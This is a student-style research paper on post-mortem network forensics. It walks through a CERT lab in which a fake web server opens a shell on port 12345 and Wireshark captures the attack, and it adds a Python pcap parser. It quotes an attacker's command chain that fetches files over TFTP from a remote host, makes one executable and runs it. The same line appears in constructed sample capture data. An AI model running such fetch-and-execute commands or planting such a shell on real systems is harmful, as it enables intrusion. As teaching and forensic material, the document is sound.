Post Mortem Forensic Analysis - Research Paper Example

Summary
The writer of the essay "Post Mortem Forensic Analysis" has demonstrated the importance of digital forensic investigations that may significantly impact financial institutions due to their nature of the business and paramount financial and information assets residing on the network…
Extract of sample "Post Mortem Forensic Analysis"

Post Mortem Forensic Analysis

Introduction

In the current advancements of the computing world, attackers launch widespread attacks that are vivid and intense in order to compromise or destroy the target. Researchers have studied these attacks in order to provide secure mechanisms that may effectively detect and fight them. These mechanisms, known as IDS, antivirus, anti-spam and anti-spyware, provide only limited benefits to end users. Moreover, these security frameworks do not support forensic investigation and post mortem analysis of a particular breach or incident within the network. In order to initiate a forensic analysis, the first step is to determine the point of breach into the network. After identifying the point of breach, a forensic examiner can evaluate how it was exploited. The examiner can also identify the source of the threat, i.e. the Internet. As per the scenario, a large computer network is compromised by a threat that may also have compromised classified documents. The report demonstrates the forensic analysis with the aid of FTK tools in order to identify the root cause of the threat.

Overview

If an organization is affected by a security breach, it is in some cases difficult to calculate the risks to the information assets present on the network; this depends on the severity of the threat, which may have caused large disruptions to network-based services. This is the point where digital forensic experts are brought in to identify the threat, its impact and the network incidents it caused. Organizations learn new techniques and methods from an ongoing investigation by a digital forensic expert; the point of interception, the methodology and the protection measures are considered critical.

Financial institutions are keener to adopt forensic analysis, as this domain, given its business model and the nature of its data, cannot compromise on security (Network postmortem: Forensic analysis after a compromise, n.d.). For instance, MasterCard, Visa and American Express demonstrate solid online security frameworks. In the current scenario, where a network has already been breached by a threat, these forensic experts focus on three core factors (Network postmortem: Forensic analysis after a compromise, n.d.):

  • A discovery process focused on understanding the application and network infrastructure, as well as the business information flow of the organization
  • Interviews with key personnel to understand the facts of the case from the customer's perspective and identify suitable sources of forensic data
  • Data collection to gather critical sources of evidence to support the investigation, followed by analysis

Methodology

Assuming that the threat initially breached the application server that served as the organization's intranet, the forensic investigators construct a methodology that monitors attacks on inbound and outbound traffic. Three processes are executed in order to detect the cause and the source:

  • pcap trace analysis of server-side attacks
  • pcap trace analysis of client-side attacks
  • NetFlow analysis for network flow monitoring

In order to capture attacks, the forensic investigators implemented a vulnerable HTTP server. The server acts as the original server and answers every HTTP query; however, when processing a 'POST' request it starts a separate thread that exposes a shell on port 12345. The replicated fake web server processes the shellcode in the same way as the original one. The tool used for exploiting and capturing network traffic is Wireshark (Cert Exercises Handbook – Scribd, n.d.). It is an open-source tool for capturing data packets and examining network traffic on wired and wireless networks (Wireshark Network Analysis, n.d.). Here it captures and examines the network traffic on the Ethernet interface connected to the fake web server. Apart from Wireshark, a TFTP server and a TFTP client are also set up. As the web server runs Apache, one more tool, named exploit, is invoked with the following command (Cert Exercises Handbook – Scribd, n.d.):

    /usr/share/exercises/07_NF/adds/exploit

Before starting the replicated fake web server, the Apache service must be stopped. The next step is to start the server by executing the following command (Cert Exercises Handbook – Scribd, n.d.):

    sudo /etc/init.d/http_server

The next step is to run the customized scripts named interface_affected and interface_hacker. The pcap file records the attacks, which are initiated from an IP address different from the victim's.

Executing Wireshark

Before the exploitation process is executed, Wireshark is started in order to capture live traffic on the loopback interface. After starting the tool, the local URL is opened in the browser. To generate more requests to the same site, the user navigates around the local site. In this process, the activity causes files related to the malicious code to be copied to the replicated fake web server. The attacker's files are copied to the root folder, as the server was logged in with root credentials. Consequently, the files transmitted from the hacker's computer to the fake replicated web server were captured by Wireshark, and the packets that exploited the server were captured as well and can now be investigated (Cert Exercises Handbook – Scribd, n.d.).
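One way to carry out the port-12345 analysis on the saved capture outside Wireshark, as an added example that is not part of the original essay or the CERT exercise: a pure-Python reader for a classic libpcap file that collects the TCP payload of every flow touching the shell port and flags the fetch-and-execute commands. The helper names (build_frame, build_pcap, tcp_streams, flag_downloads), the hosts 10.0.0.9 (attacker) and 10.0.0.5 (fake server) and the capture bytes are all constructed here.

```python
import socket
import struct

SHELL_PORT = 12345  # the port the exercise's exploit shell listens on

def build_frame(src, dst, sport, dport, payload):
    """Constructed Ethernet/IPv4/TCP frame for the sample capture (checksums left as zero)."""
    eth = b"\x00" * 12 + b"\x08\x00"
    tcp = struct.pack("!HHIIBBHHH", sport, dport, 1, 1, 5 << 4, 0x18, 65535, 0, 0) + payload
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), 0, 0x4000, 64, 6, 0,
                     socket.inet_aton(src), socket.inet_aton(dst))
    return eth + ip + tcp

def build_pcap(frames):
    """Wrap frames in a classic libpcap file (magic 0xA1B2C3D4, link type 1 = Ethernet)."""
    out = [struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, 1)]
    for i, frame in enumerate(frames):
        out.append(struct.pack("<IIII", 1000 + i, 0, len(frame), len(frame)) + frame)
    return b"".join(out)

def tcp_streams(pcap, port=SHELL_PORT):
    """Walk a libpcap file and collect TCP payload per flow for flows touching `port`."""
    streams, pos = {}, 24  # 24 = length of the pcap global header
    while pos + 16 <= len(pcap):
        incl = struct.unpack_from("<I", pcap, pos + 8)[0]  # captured length of this record
        frame, pos = pcap[pos + 16:pos + 16 + incl], pos + 16 + incl
        ip = frame[14:]
        if frame[12:14] != b"\x08\x00" or ip[9] != 6:
            continue  # keep only IPv4 frames carrying TCP
        ihl, total = (ip[0] & 0x0F) * 4, struct.unpack_from("!H", ip, 2)[0]
        tcp = ip[ihl:total]
        sport, dport = struct.unpack_from("!HH", tcp)
        if port in (sport, dport):
            key = (socket.inet_ntoa(ip[12:16]), sport, socket.inet_ntoa(ip[16:20]), dport)
            streams[key] = streams.get(key, b"") + tcp[(tcp[12] >> 4) * 4:]  # skip TCP header
    return streams

def flag_downloads(streams):
    """Commands in the captured flows that fetch a remote file or execute a freshly dropped one."""
    return [(key, c.strip()) for key, data in streams.items()
            for c in data.decode("latin-1").split(";")
            if c.strip().startswith(("atftp", "chmod +x", "./"))]

# Constructed sample: attacker 10.0.0.9 drives the shell on 10.0.0.5, plus one unrelated HTTP request.
SAMPLE_CMDS = (b"cd ~; atftp --get --remote-file exploit2 10.0.0.9; "
               b"atftp --get --remote-file hello 10.0.0.9; chmod +x hello; ./hello")
SAMPLE_PCAP = build_pcap([
    build_frame("10.0.0.9", "10.0.0.5", 40001, SHELL_PORT, SAMPLE_CMDS),
    build_frame("10.0.0.5", "10.0.0.9", SHELL_PORT, 40001, b"\n"),
    build_frame("10.0.0.9", "10.0.0.5", 40002, 80, b"GET / HTTP/1.0\r\n\r\n"),
])
```

Pointing tcp_streams at a real capture (open(path, "rb").read()) gives the same per-flow view that the Wireshark port filter provides, and flag_downloads pulls out the transfer and execution steps for the report.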
As mentioned earlier, the exploit operates on port 12345, so all traffic directed to this port can be analysed. To isolate it, a filter is required that separates the traffic to and from port 12345. After the TCP session has been initiated, the following commands are executed (Cert Exercises Handbook – Scribd, n.d.):

    cd ~; atftp --get --remote-file exploit2 IP address; atftp --get --remote-file hello IP address; chmod +x hello; ./hello

Conclusion

In this short forensic post mortem report, we have demonstrated the importance of digital forensic investigations, which may significantly impact financial institutions because of the nature of their business and the paramount financial and information assets residing on the network. We have also demonstrated a methodology, including several forensic investigation tools, that may aid in extracting evidence and identifying the source of threats on the Internet.

References

Network postmortem: Forensic analysis after a compromise ... (n.d.). Retrieved from http://www.computerworld.com/s/article/87969/Network_postmortem_Forensic_analysis_after_a_compromise
Cert Exercises Handbook - Scribd. (n.d.). Retrieved from http://www.scribd.com/doc/35011748/Cert-Exercises-Handbook
Wireshark Network Analysis. (n.d.). Retrieved from http://wiresharkbook.com/articlewireshark101.html